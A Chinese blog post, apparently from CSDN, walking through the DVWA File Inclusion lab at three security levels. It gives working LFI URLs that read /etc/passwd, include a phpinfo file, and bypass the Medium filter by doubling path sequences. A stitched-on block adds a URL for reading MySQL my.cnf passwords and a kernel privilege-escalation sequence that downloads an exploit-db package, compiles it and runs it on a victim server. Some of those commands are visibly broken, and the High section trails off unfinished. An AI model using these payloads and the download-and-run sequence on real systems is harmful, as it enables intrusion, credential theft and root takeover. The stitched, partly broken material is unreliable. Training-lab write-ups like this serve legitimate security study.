DVWA8_File Inclusion (文件包含)

LOW

Medium

High

LOW

代码分析

后端代码分析无任何限制

漏洞利用

本地包含

点击漏洞点构造攻击http://192.168.4.32/dvwa/vulnerabilities/fi/?page=/etc/passwd

得到系统类型,暴露绝对路径

创建file_inclusion_low.txt文件:/*<?php phpinfo(); ?>*/

包含路径一般有绝对路径和相对路径均可

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=../../../../../../../../../phpStudy/WWW/DVWA/file_inclusion_low.txt

远程包含

可通过远程搭建http/https服务进行文件包含

Medium

代码分析

Medium后端

过滤了”http:// ”、”https://”、 ” ../”、”..\”字符,检查存在及替换为空

漏洞利用

这种黑名单式限制一般很容易绕过,双写即可

本地包含测试

绝对路径,直接写就行,不影响

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=C:/phpStudy/WWW/DVWA/file_inclusion_low.txt

相对路径,双写绕过

#http://192.168.4.32/dvwa/vulnerabilities/fi/?page=..././..././..././....//..././phpStudy/WWW/DVWA/file_inclusion_low.txt

 

High

代码分析

High级别的代码使用了fnmatch函数检查$page,开头为file,服务器才会去包含相应的文件。

 

漏洞测试

可使用文件协议file绕过,file读取文件需知道绝对路径,可用绝对路径方式测试

绝对路径

 

### 文件包含漏洞利用方法 在 DVWA(Damn Vulnerable Web Application)环境中,文件包含漏洞通常可以通过本地文件包含(LFI)或远程文件包含(RFI)来实现。以下是关于如何通过该漏洞访问数据库的相关信息。 #### 利用 LFI 获取敏感数据 如果目标系统允许用户输入路径并加载文件,则可能暴露出 `/etc/passwd` 或者 MySQL 配置文件 `my.cnf` 的内容。后者尤其重要因为它经常保存着 root 用户密码明文形式[^1]: ```bash http://<target>/dvwa/vulnerabilities/fi/?page=../../../../../../../../../etc/mysql/my.cnf ``` 上述 URL 尝试读取位于标准位置下的 MySQL 设置文档。假如成功返回结果,其中应可见如下片段: ``` [client] password = your_database_password_here ``` #### 提升权限至 Root 年度案例分析 对于更高级别的攻击场景比如提到的 Linux 内核版本特定缺陷(CVE编号待确认),可参考已知公开资源说明操作流程[^2]。例如针对 Ubuntu 16.04 上运行 kernel 4.4.x 系列存在 double-fdput() BPF_PROG_LOAD 权限提升问题实例化过程概述如下: - 下载对应 exploit 脚本包; - 解压缩后上传到受害服务器执行; 实际命令序列展示: ```bash wget https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip unzip 39772.zip chmod +x 39772.c gcc -o exploit 39772.c ./exploit ``` 完成这些步骤之后理论上可以获得更高层次控制权即成为超级管理员角色(root)。 ### 注意事项 始终提醒自己遵循合法授权范围内测试原则,未经授权擅自尝试突破防护措施属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值